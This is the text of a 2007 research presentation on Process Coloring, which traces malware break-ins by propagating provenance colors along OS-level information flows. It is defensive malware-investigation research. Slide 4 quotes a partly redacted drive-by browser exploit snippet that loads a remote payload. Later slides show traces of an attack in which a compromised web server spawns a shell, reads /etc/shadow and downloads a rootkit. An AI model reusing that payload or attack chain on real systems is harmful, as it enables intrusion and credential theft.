Process Coloring: an Information Flow-Preserving Approach to Malware Investigation Eugene Spafford, Dongyan Xu (Presenter) Department of Computer Science.


1 Process Coloring: an Information Flow-Preserving Approach to Malware Investigation
Eugene Spafford, Dongyan Xu (Presenter), Department of Computer Science and Center for Education and Research in Information Assurance and Security (CERIAS), Purdue University
Xuxian Jiang, Department of Information and Software Engineering, George Mason University
NICIAR Site Visit, West Lafayette, IN, July 19, 2007

2 Motivation
- Internet malware remains a top threat
- Malware: viruses, worms, rootkits, spyware, bots…

3 Motivation

4 Motivation
- Upon clicking a malicious URL: http://xxx.9x.xx8.8x/users/xxxx/xxx/laxx/z.html
- Result: 22 unwanted programs are installed without the user’s consent!
- Figure labels: MS04-013, MS03-011, MS05-002
Snippets shown on the slide:
* {CURSOR: url("http://vxxxxxxe.biz/adverts/033/sploit.anr")}
try{ document.write('<object data=`&#109&#115&#45&#105&#116&#115&#58 &#109&#104&#116&#109&#108&#58&#102&#105&#108&#101: //C:\fo'+'o.mht!'+'http://vxxxx'+'xxe.biz//adv'+'erts//033//targ.ch'+ 'm::/targ'+'et.htm` type=`text/x-scriptlet`> '); }catch(e){}

5 Our Challenge: Enabling Timely, Efficient Malware Investigation
- Raising timely alert to trigger a malware investigation
- Identifying the break-in point of the malware
- Reconstructing all contaminations by the malware
[Figure: timeline for today’s log-based intrusion investigation tools (e.g., BackTracker, Taser). Labels: Time, Infection, Break-in point, Log, Detection, External detection point, Break-in point trace-back, Contamination reconstruction]

6 Limitations of Today’s Tools
- Long “infection-to-detection” interval
- Entire log needed for both trace-back and reconstruction
- Questionable trustworthiness of log data
[Figure: timeline for existing log-based intrusion investigation tools. Labels: Time, Infection, Break-in point, Log, Detection, External detection point, Break-in point trace-back, Contamination reconstruction]

7 Goals of Research
- Improve malware defense capabilities of enterprise computing infrastructure:
  - Detection of malware activity
  - Identification of vulnerable programs/applications
  - Accountability of computation activities
  - Recoverability from malware contaminations
  - Proactive protection of sensitive information/data
- Demonstrate via success metrics with respect to:
  - Timeliness
  - Efficiency
  - Accuracy

8 Goals of Research
- Goals fit within NICECAP research themes
  - “Accountable information flows”
    - Based on information flow theory
    - Instantiated at operating system level
    - Holding malware accountable
  - “Large-scale system defense”
    - Targeting large-scale malware infection (e.g., botnets)
    - Enabling malware detection and remediation
    - Providing first line of response (applicable to legacy applications w/o source code)

9 Technical Approach: Process Coloring
- Key idea: propagating malware break-in provenance information (“colors”) along OS-level information flows
- Existing tools only consider direct causality relations without preserving and exploiting break-in provenance information
[Figure: architecture diagram. Labels: Attacker; Apache, Sendmail, DNS, MySQL, …; Logger; Guest OS; Virtual Machine; Virtual Machine Monitor (VMM); Log; Log Monitor; “Runtime alert triggered by log color anomalies”]

10 New Capabilities of Process Coloring
- Color-based malware warning (vs. external detection point)
- Color-based break-in point identification (vs. back-tracking)
- Color-based log partitioning (vs. entire log) for reconstruction
[Figure: timeline. Labels: Time, Infection, Break-in point, Detection, Contamination reconstruction]

11 Impact of Success
- How will it benefit the NIC?
  - Accountability of NIC cyber infrastructure
  - Readiness against current and emerging malware threats (e.g., botnets, rootkits, spyware) to NIC
  - Protection of NIC critical data, information, and computation activities
  - Reduction of NIC human labor in malware investigation

12 Impact of Success
- How will it benefit the IA community?
  - Systematic model for OS-level information flows
  - Mechanisms and policies for elevated accountability of commodity OS
  - Tools and methods for malware alert, investigation, and recovery
  - Artifacts, data, insights and lessons for further malware research

13 Sample Scenario
- Question 1: How is the malware detected?
- Question 2: How does the malware break into the system?
- Question 3: What does the malware do after break-in?
[Figure: httpd, /bin/sh, wget, Root kit, local files, netcat, /etc/shadow (Confidential Info), Alert]

14 Existing Approach
1. Online log collection
Log:
- “httpd” READS an incoming request
- “httpd” CREATES a new process “/bin/sh”
- “/bin/sh” CREATES a new process “netcat”
- “netcat” READS “/etc/shadow” file
- “/bin/sh” MODIFIES local files
- “/bin/sh” CREATES a new process “wget”
- “wget” CREATES local file(s) - “Root kit”
[Figure: httpd, /bin/sh, wget, Root kit, local files, netcat, /etc/shadow (Confidential Info); Alert at the external detection point]

15 Existing Approach
1. Online log collection
2. Offline backward tracking [King+, SOSP’03]
Backward tracking from the Alert (external detection point):
- “wget” CREATES local file(s) - “Root kit”
- “/bin/sh” CREATES a new process “wget”
- “httpd” CREATES a new process “/bin/sh”
- Break-in point!
[Figure: httpd, /bin/sh, wget, Root kit, Alert, Log]

16 Existing Approach
1. Online log collection
2. Offline backward tracking
3. Offline forward tracking
Forward tracking from the break-in point:
- “httpd” CREATES a new process “/bin/sh”
- “/bin/sh” CREATES a new process “netcat”
- “netcat” READS “/etc/shadow” file
- “/bin/sh” MODIFIES local files
- “/bin/sh” CREATES a new process “wget”
- “wget” CREATES local file(s) - “Root kit”
[Figure: httpd, /bin/sh, wget, Root kit, local files, netcat, /etc/shadow (Confidential Info); Alert at the external detection point; Log]
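The log-based workflow on slides 14 to 16 can be sketched in a few lines of Python. This is an illustration only, not the actual BackTracker or Taser algorithm: the `Event` record, the `flow` and `track` helpers, and the decision to ignore timestamps are assumptions made for the example. The event list is the slide 14 log.

```python
from collections import namedtuple

# Hypothetical log record: a subject performs an operation on an object.
Event = namedtuple("Event", ["subject", "op", "obj"])

# The seven entries from the slide 14 log.
LOG = [
    Event("httpd", "READS", "incoming request"),
    Event("httpd", "CREATES", "/bin/sh"),
    Event("/bin/sh", "CREATES", "netcat"),
    Event("netcat", "READS", "/etc/shadow"),
    Event("/bin/sh", "MODIFIES", "local files"),
    Event("/bin/sh", "CREATES", "wget"),
    Event("wget", "CREATES", "Root kit"),
]


def flow(event):
    """Return (source, sink) of the information flow implied by an event."""
    if event.op == "READS":
        return event.obj, event.subject  # data flows into the reader
    return event.subject, event.obj      # CREATES / MODIFIES flow outward


def track(log, start, backward):
    """Follow dependency edges from `start`, backward or forward."""
    reached, frontier = {start}, [start]
    while frontier:
        node = frontier.pop()
        for event in log:  # every step rescans the whole log
            source, sink = flow(event)
            here, other = (sink, source) if backward else (source, sink)
            if here == node and other not in reached:
                reached.add(other)
                frontier.append(other)
    return reached


ancestors = track(LOG, "Root kit", backward=True)   # step 2: trace-back
contaminated = track(LOG, "httpd", backward=False)  # step 3: reconstruction
```

Backward tracking from "Root kit" reaches wget, /bin/sh, httpd, and the incoming request; forward tracking from httpd reaches /bin/sh, netcat, local files, wget, and the Root kit. Both passes scan the entire log, which is the cost that the limitations slide points out.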

17 Process Coloring Approach
1. Initial coloring
2. Coloring diffusion
- Capability 1: Color-based malware warning
- Capability 2: Color-based identification of break-in point
- Capability 3: Color-based log partition for contamination analysis
[Figure: init and rc start the services s30sendmail, s45named, s55sshd, and s80httpd; the diagram then shows httpd, /bin/sh, wget, Root kit, local files, netcat, /etc/shadow (Confidential Info), and the Log]

18 Timeliness by Process Coloring: Color-Based Malware Warning
Capability 1: Color-based malware warning: “unusual color inheritance”
...
BLUE: 673["sendmail"]: 5_open("/proc/loadavg", 0, 438) = 5
BLUE: 673["sendmail"]: 192_mmap2(0, 4096, 3, 34, 4294967295, 0) = 1073868800
BLUE: 673["sendmail"]: 3_read(5, "0.26 0.10 0.03 2...", 4096) = 25
BLUE: 673["sendmail"]: 6_close(5) = 0
BLUE: 673["sendmail"]: 91_munmap(1073868800, 4096) = 0
...
RED: 2568["httpd"]: 102_accept(16, sockaddr{2, cbbdff3a}, cbbdff38) = 5
RED: 2568["httpd"]: 3_read(5, "\1281\1\0\2\0\24...", 11) = 11
RED: 2568["httpd"]: 3_read(5, "\7\0À\5\0\128\3\...", 40) = 40
RED: 2568["httpd"]: 4_write(5, "\132@\4\0\1\0\2\...", 1090) = 1090
…
RED: 2568["httpd"]: 4_write(5, "\128\19Ê\136\18\...", 21) = 21
RED: 2568["httpd"]: 63_dup2(5, 2) = 2
RED: 2568["httpd"]: 63_dup2(5, 1) = 1
RED: 2568["httpd"]: 63_dup2(5, 0) = 0
RED: 2568["httpd"]: 11_execve("/bin//sh", bffff4e8, 00000000)
RED: 2568["sh"]: 5_open("/etc/ld.so.prelo...", 0, 8) = −2
RED: 2568["sh"]: 5_open("/etc/ld.so.cache", 0, 0) = 6
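One possible reading of “unusual color inheritance” in the excerpt above is that a shell ends up carrying a network service's color. The sketch below flags colored `execve` entries whose target is a shell. The slides do not define the warning rule, so the `SHELLS` set, the `ENTRY` pattern, and the `unusual_inheritance` helper are all assumptions made for illustration; the sample lines are copied from the slide.

```python
import re

# Assumed entry shape, taken from the excerpt: COLOR: pid["name"]: NN_syscall(args...
ENTRY = re.compile(
    r'^(?P<color>[A-Z+]+): (?P<pid>\d+)\["(?P<name>[^"]+)"\]: '
    r'\d+_(?P<syscall>\w+)\((?P<args>.*)'
)

SHELLS = {"sh", "bash"}  # assumption: program names treated as shells


def unusual_inheritance(lines):
    """Return (color, pid, process, target) for colored processes that exec a shell."""
    warnings = []
    for line in lines:
        entry = ENTRY.match(line.strip())
        if entry is None or entry["syscall"] != "execve":
            continue
        quoted = re.search(r'"([^"]*)"', entry["args"])  # first quoted argument
        if quoted is None:
            continue
        target = quoted.group(1)
        program = target.rstrip("/").split("/")[-1]  # "/bin//sh" -> "sh"
        if program in SHELLS:
            warnings.append((entry["color"], int(entry["pid"]), entry["name"], target))
    return warnings


EXCERPT = [
    'BLUE: 673["sendmail"]: 6_close(5) = 0',
    'RED: 2568["httpd"]: 63_dup2(5, 0) = 0',
    'RED: 2568["httpd"]: 11_execve("/bin//sh", bffff4e8, 00000000)',
    'RED: 2568["sh"]: 5_open("/etc/ld.so.cache", 0, 0) = 6',
]

alerts = unusual_inheritance(EXCERPT)
```

On these four lines the only alert is the RED httpd process (pid 2568) executing "/bin//sh". A real policy would need a profile of which programs each service legitimately runs.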

19 Timeliness by Process Coloring: Color-Based Malware Warning
- Another example: “color mixing”
RED: 1234 ["httpd"]: …
RED+BLUE: 1234 ["httpd"]: system call to read file index.html
[Figure: bind, cp defaced.html index.html, index.html, httpd]
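Color mixing shows up in the log as an entry whose label carries more than one color. A minimal sketch of spotting such entries follows; it assumes colors in a label are joined with "+" as in the slide's example, and the helper name `mixed_color_entries` is hypothetical.

```python
def mixed_color_entries(lines):
    """Yield (colors, rest_of_entry) for entries labeled with more than one color."""
    for line in lines:
        label, sep, rest = line.partition(":")  # label is the text before the first colon
        colors = [c.strip() for c in label.split("+") if c.strip()]
        if sep and len(colors) > 1:
            yield colors, rest.strip()


LINES = [
    'RED: 1234 ["httpd"]: …',
    'RED+BLUE: 1234 ["httpd"]: system call to read file index.html',
]

mixed = list(mixed_color_entries(LINES))
```

Only the second line is reported, with colors RED and BLUE. Whether a given mix is malicious or legal is a separate policy question, which the later slides on client-side investigation take up.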

20 Efficiency by Process Coloring
- Capability 2: Color-based break-in point identification
- Capability 3: Color-based log partitioning
Time period being analyzed: 24 hours
Worm | Exploited service | # worm-related entries | % of log inspected
Lion | BIND (CVE-2001-0010) | 66,504 | 48.7%
Slapper | Apache (CAN-2002-0656) | 195,884 | 65.9%
SARS | Samba (CAN-2003-0085) | 19,494 | 12.1%
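Color-based log partitioning amounts to keeping only the entries that carry the color of the break-in point. The sketch below shows the idea on a made-up four-entry log; the entry layout (a set of colors plus a text field) and both helper names are assumptions, and the toy numbers are not related to the figures in the table above.

```python
def partition_by_color(entries, color):
    """Keep only the entries whose color set contains `color`."""
    return [entry for entry in entries if color in entry[0]]


def percent_of_log(partition, entries):
    """Share of the full log, in percent, that the partition represents."""
    return 100.0 * len(partition) / len(entries) if entries else 0.0


# Made-up entries for illustration: (set of colors, description).
TOY_LOG = [
    ({"BLUE"}, 'sendmail: open("/proc/loadavg")'),
    ({"RED"}, "httpd: accept"),
    ({"RED"}, 'httpd: execve("/bin//sh")'),
    ({"GREEN"}, "named: read"),
]

red_partition = partition_by_color(TOY_LOG, "RED")
share = percent_of_log(red_partition, TOY_LOG)
```

Here the RED partition holds two of the four entries, so an investigator would inspect half of this toy log instead of all of it.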

21 Accuracy by Process Coloring
- Accuracy of color-based malware warning
  - False positives and false negatives
- Accuracy of malware contamination reconstruction
  - Sufficiency of log partition (“no useful log entries left out”)
  - Compare malware action graphs with published malware analysis report
  - Limitation of causality-based reconstruction algorithms (e.g., BackTracker, Taser)

22 Accuracy of Malware Contamination Reconstruction: the Slapper Worm Example
[Figure: malware action graph. Nodes: inet_sock(80); fd 5; 2568: httpd; 2568(execve): /bin//sh; 2568(execve): /bin/bash -i; 2586: /bin/rm -rf /tmp/.bugtraq.c; 2587: /bin/cat /tmp/.uubugtraq/tmp/.bugtraq.c. Edge labels: accept; recv; dup2, read; execve; fork, execve; open, dup2, write; unlink]

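23 Research Task I: Color Diffusion Model (Month 1-6)
- Color Diffusion Model
- OS-level Information Flows
(s1, s2 denote subjects, i.e. processes; o1 denotes an object such as a file)
Operation | Diffusion | Syscalls
CREATE | create (s1 creates o1): color(o1) = color(s1) | create, mkdir, link
CREATE | create (s1 creates s2): color(s2) = color(s1) | fork, vfork, clone
READ | read (s1 reads o1): color(s1) = color(s1) ∪ color(o1) | read, readv, recv
READ | read (s1 reads s2): color(s1) = color(s1) ∪ color(s2) | ptrace
WRITE | write (s1 writes o1): color(o1) = color(s1) ∪ color(o1) | write, writev, send
WRITE | write (s1 writes s2): color(s2) = color(s1) ∪ color(s2) | ptrace, wait, signal
DESTROY | destroy (object): no diffusion listed | unlink, rmdir, close
DESTROY | destroy (subject): no diffusion listed | exit, kill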
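The diffusion rules in this table map naturally onto set operations. The following is a minimal sketch, not the project's Xen-based implementation: the `ColorTracker` class and its method names are hypothetical, colors are modeled as Python sets, and DESTROY simply forgets the entity because the slide lists no diffusion rule for it. The usage at the end replays one plausible reading of the slide 19 example, assuming a compromised bind (BLUE) spawns the `cp` that overwrites index.html.

```python
class ColorTracker:
    """Tracks a set of colors per subject (process) or object (file)."""

    def __init__(self):
        self.colors = {}  # entity name -> set of colors

    def color(self, entity):
        return self.colors.setdefault(entity, set())

    def assign(self, entity, color):
        """Initial coloring, e.g. one color per service."""
        self.color(entity).add(color)

    def create(self, s1, new):
        """CREATE: color(new) = color(s1)."""
        self.colors[new] = set(self.color(s1))

    def read(self, s1, source):
        """READ: color(s1) = color(s1) ∪ color(source)."""
        self.color(s1).update(self.color(source))

    def write(self, s1, target):
        """WRITE: color(target) = color(s1) ∪ color(target)."""
        self.color(target).update(self.color(s1))

    def destroy(self, entity):
        """DESTROY: assumed here to just drop the entity's record."""
        self.colors.pop(entity, None)


tracker = ColorTracker()
tracker.assign("httpd", "RED")
tracker.assign("bind", "BLUE")
tracker.create("bind", "cp")        # assumed: bind spawns cp
tracker.write("cp", "index.html")   # cp defaced.html index.html
tracker.read("httpd", "index.html")
```

After these steps index.html is BLUE and httpd carries both RED and BLUE, which matches the "RED+BLUE" label in the color-mixing example.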

24 Research Task II: Process Coloring for Client and Server Side Malware Investigation (Month 2-18)
- Server-side malware investigation
  - Consolidated server environment with independent server applications
  - “Clustered” information flows partitioned by server applications
  - Color mixing highly unlikely between applications
- Client-side malware investigation
  - Inter-dependent client applications (e.g., text editor → compiler; latex → dvips → ps2pdf)
  - More inter-application information flows
  - Legal color mixing exists

25 Research Task II: Process Coloring for Client and Server Side Malware Investigation (Month 2-18)
- A motivating example of client-side process coloring
[Figure: FTP and Quick Tax along a Time axis; label “Quick Tax + FTP”]

26 Research Task III: Color Mixing Handling via Information Flow Control (Month 7-18)
- Profiling legal color mixing inside a client host
  - Shared files
  - Helper processes
- Approach 1: information flow insulation
- Approach 2: information flow border control
[Figure: processes P1 and P2 with a shared file, shown for both approaches; label “Insulated”]

27 Related Work Based on Information Flows
- Instruction level information flows
  - Lacking system-wide semantic information (e.g., info. about processes and files)
- Language level information flows
  - Focusing on information flows inside a program
- Operating system level information flows
  - Complementing the above categories
  - Revealing system-wide semantic information
  - Benefiting detection, recovery, and forensics as first line of defense

28 Metrics: Definitions
- Timeliness
  - Malware infection-to-warning interval
- Efficiency
  - Percentage of log reduction for malware contamination reconstruction
- Accuracy
  - False positive rate of malware warning
  - False negative rate of malware warning
  - Correctness of malware action graphs
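The quantitative metrics above could be computed along the following lines. The slides name the metrics but give no formulas, so this sketch uses the conventional definitions of false positive and false negative rates and treats log reduction as the share of the log that need not be inspected; all function names and the sample numbers in the test are hypothetical.

```python
def infection_to_warning(infection_time, warning_time):
    """Timeliness: seconds between infection and the first color-based warning."""
    return warning_time - infection_time


def log_reduction_percent(total_entries, inspected_entries):
    """Efficiency: percentage of the log that did not need to be inspected."""
    if total_entries == 0:
        return 0.0
    return 100.0 * (1 - inspected_entries / total_entries)


def warning_rates(true_pos, false_pos, true_neg, false_neg):
    """Accuracy: (false positive rate, false negative rate) of the warnings."""
    benign = false_pos + true_neg      # cases with no malware present
    malicious = true_pos + false_neg   # cases with malware present
    fpr = false_pos / benign if benign else 0.0
    fnr = false_neg / malicious if malicious else 0.0
    return fpr, fnr
```

Correctness of malware action graphs is a qualitative comparison against published analyses and is not covered by this sketch.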

29 Metrics: Evaluation Plan
- Sources of malware
  - Repository of malware (worms, botware, rootkits)
  - Malware captured by honeypots and honeyfarm
- Target computing environments
  - Consolidated servers
  - Clients
- Experiment environments
  - VM-based honeyfarm (Collapsar)
  - VM-based malware playground (vGround)
- Methodology: Evaluate by comparison
  - With process coloring
  - Without process coloring

30 Project Organization and Management
- Purdue Team
  - Faculty: Eugene Spafford, Dongyan Xu
  - Graduate students: Ryan Riley, Larissa O’Brien, TBD
  - Budget: $xxx,xxx
- George Mason Team
  - Faculty: Xuxian Jiang
  - Graduate student: TBD
  - Budget: $xxx,xxx

31 Project Organization and Management
[Figure: Gantt chart over months 1 to 18. Rows: 1. Task I (Section 3.1); 2. Task II (Section 3.2), with Subtasks II.1, II.2, II.3; 3. Task III (Section 3.3), with Subtasks III.1, III.2, III.3; 4. Meetings and Document Prep; 5. Prototype Instantiation Tasks. Other labels: Experiments; Software Deliverable; Quarterly Program Reviews; Site Visit; June 7th, 2007. Software Demonstrations: #1 Basic Xen-based prototype; #2 Tools for malware investigation; #3 Mechanisms for color mixing control]

32 Project Organization and Management
Spending during Summer’07:
- Purdue: One month graduate student support (half-time)
- GMU: One month summer salary (planned)

33 Recent Progress
- Identifying color diffusion operations in Linux OS
- Starting to implement log coloring and collection on Xen VMM
[Figure: project timeline with a “We are here” marker]

34 Projected Progress in the Next 3-6 Months
- 11/21/07: A comprehensive color diffusion model under Linux
- 12/07/07: Demo and software release of basic Xen-based prototype

35 Technology Transfer Plan
- Potential adopters
  - Computer forensics/malware investigators and researchers
  - System administrators
  - Anti-malware software companies
  - Open source communities (e.g., XenSource)
- Software release and documentation
- Presentations and demos to potential NIC adopters
- Presentations and demos to anti-malware software companies (Symantec, Microsoft, VMware)

36 Thank you!
For more information about the Process Coloring project:
http://cairo.cs.purdue.edu/projects/pc
PC@cs.purdue.edu

